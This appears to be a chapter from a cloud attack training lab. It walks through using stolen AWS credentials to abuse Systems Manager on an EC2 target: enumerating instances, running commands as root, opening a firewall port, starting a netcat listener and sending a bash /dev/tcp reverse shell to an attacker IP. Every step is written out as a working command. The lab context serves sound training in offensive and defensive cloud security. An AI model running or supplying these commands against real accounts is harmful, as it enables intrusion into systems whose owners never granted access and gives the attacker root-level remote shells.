AWS EC2 Reverse Shell via SSM

Introduction

AWS Systems Manager (SSM) is a capability within AWS that allows administrators to manage resources using the AWS CLI or Console by interacting with an agent running on these resources.

We can use SSM to execute commands, connect via the SSH console in the UI, deploy updates, take backups and other administrative tasks.

As an attacker, we can (ab)use SSM to gain a reverse shell to our compute-target so that we can inspect the file system and have access to the network that it can see.

What are we going to cover?

We will use the stolen credentials from the previous chapter and execute a shell script on the compute-target. This shell script will give us shell execution capabilities via a reverse shell that will connect back to our attacker machine.

Executing commands on the target

We will now try to run a command on the compute-target EC2 instance within the environment using AWS SSM service accessed via the stolen credentials.

Let us enumerate the instances that have the AWS SSM service running using the below command.

aws ssm describe-instance-information --profile stolencreds

describe instance information

Note the instance ID of the machine which we will use to perform command execution using SSM.

Using the instanceid from the describe-instance-information above, run the following commands

• The AWS SSM send-command to send a command to the AWS instance and retrieve the command ID to read the output of the command.

aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds

ssm ifconfig

• Next, use the AWS SSM list-command-invocations to read the output of ifconfig using the command ID.

aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

ssm command output

Remember, AWS SSM agent runs as root/administrator on the EC2 instance, therefore, any command that you run through AWS SSM will execute with administrative privileges.

Reverse shell using inline script

As we can use SSM to execute commands, we can use it to obtain a shell on the remote system. Using the AWS-RunRemoteScript document we can execute a script hosted either on Github or an S3 bucket.

Run these commands from the student machine

• On the attacker machine, via an SSH terminal, run the below command to make an iptable rule to allow traffic to port 9999

sudo iptables -I INPUT -p tcp -m tcp --dport 9999 -j ACCEPT

• On the attacker machine where you will catch the reverse shell, start netcat using the below command

nc -nlvp 9999

• Back on the student machine, run the following command, replacing the ATTACKER-INTERNAL-IP with the private IP address of the attacker machine and INSTANCE-ID with that of the target. The attacker machine and the compute target can both talk to each other as they are in the same VPC.

aws ssm send-command --instance-ids "INSTANCE-ID" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters 'commands="bash -c \"bash -i >& /dev/tcp/ATTACKER-INTERNAL-IP/9999 0>&1\""' --output text --query "Command.CommandId"

• A reverse shell will have connected to the netcat listener

reverse shell received

Additional references

• Reference for the send-command

• Running Scripts from Amazon S3

• Remotely Run Commands on an EC2 Instance with AWS Systems Manager

• Getting shell and data access in AWS by chaining vulnerabilities